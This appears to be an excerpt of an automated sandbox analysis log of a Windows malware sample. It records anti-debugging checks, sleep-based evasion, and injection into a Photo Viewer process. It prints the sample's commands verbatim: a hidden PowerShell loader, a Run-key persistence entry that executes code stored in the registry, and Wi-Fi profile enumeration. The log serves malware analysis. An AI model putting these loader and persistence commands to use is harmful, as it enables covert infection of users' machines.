            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -598741s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -598630s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -598518s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -598391s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -598279s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -598167s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -598056s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -597945s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -597833s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -597715s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -597610s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -597482s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -597370s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -597258s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -597146s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -597034s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -596906s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -596794s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -596682s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -596571s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -596460s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -596348s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -596220s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -596093s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -595981s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -595870s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -595760s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -595647s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -595537s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -595425s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -595300s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -595173s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -595045s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -594933s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -594822s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -594711s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -594599s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -594471s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168Thread sleep time: -594343s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 1172Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 600000
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 599888
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 599776
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 599664
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 599554
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 599443
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 599332
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 599204
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 599076
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 598964
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 598852
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 598741
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 598630
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 598518
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 598391
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 598279
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 598167
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 598056
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 597945
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 597833
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 597715
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 597610
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 597482
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 597370
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 597258
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 597146
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 597034
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 596906
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 596794
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 596682
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 596571
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 596460
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 596348
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 596220
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 596093
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 595981
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 595870
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 595760
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 595647
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 595537
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 595425
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 595300
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 595173
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 595045
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 594933
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 594822
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 594711
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 594599
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 594471
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 594343
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Pitapats\gimmickry\
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Pitapats\
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Curan158\
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe base: 44E0000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe base: 327FDBC
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe base: 4260000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe base: 2DBFB9C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udbygningerne230" /t REG_EXPAND_SZ /d "%Smreplse% -windowstyle minimized $Zayat=(Get-ItemProperty -Path 'HKCU:\Nonfanatical\').Injectors;%Smreplse% ($Zayat)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$skovridergaards=get-content 'c:\users\user\appdata\roaming\pitapats\gimmickry\passiveness\kdbjergenes\hlidhskjalf\mezuzot.epo';$articulations=$skovridergaards.substring(60455,3);.$articulations($skovridergaards)"
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$skovridergaards=get-content 'c:\users\user\appdata\roaming\pitapats\gimmickry\passiveness\kdbjergenes\hlidhskjalf\mezuzot.epo';$articulations=$skovridergaards.substring(60455,3);.$articulations($skovridergaards)"
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$skovridergaards=get-content 'c:\users\user\appdata\roaming\pitapats\gimmickry\passiveness\kdbjergenes\hlidhskjalf\mezuzot.epo';$articulations=$skovridergaards.substring(60455,3);.$articulations($skovridergaards)"
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$skovridergaards=get-content 'c:\users\user\appdata\roaming\pitapats\gimmickry\passiveness\kdbjergenes\hlidhskjalf\mezuzot.epo';$articulations=$skovridergaards.substring(60455,3);.$articulations($skovridergaards)"
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "udbygningerne230" /t reg_expand_sz /d "%smreplse% -windowstyle minimized $zayat=(get-itemproperty -path 'hkcu:\nonfanatical\').injectors;%smreplse% ($zayat)"
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "udbygningerne230" /t reg_expand_sz /d "%smreplse% -windowstyle minimized $zayat=(get-itemproperty -path 'hkcu:\nonfanatical\').injectors;%smreplse% ($zayat)"
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
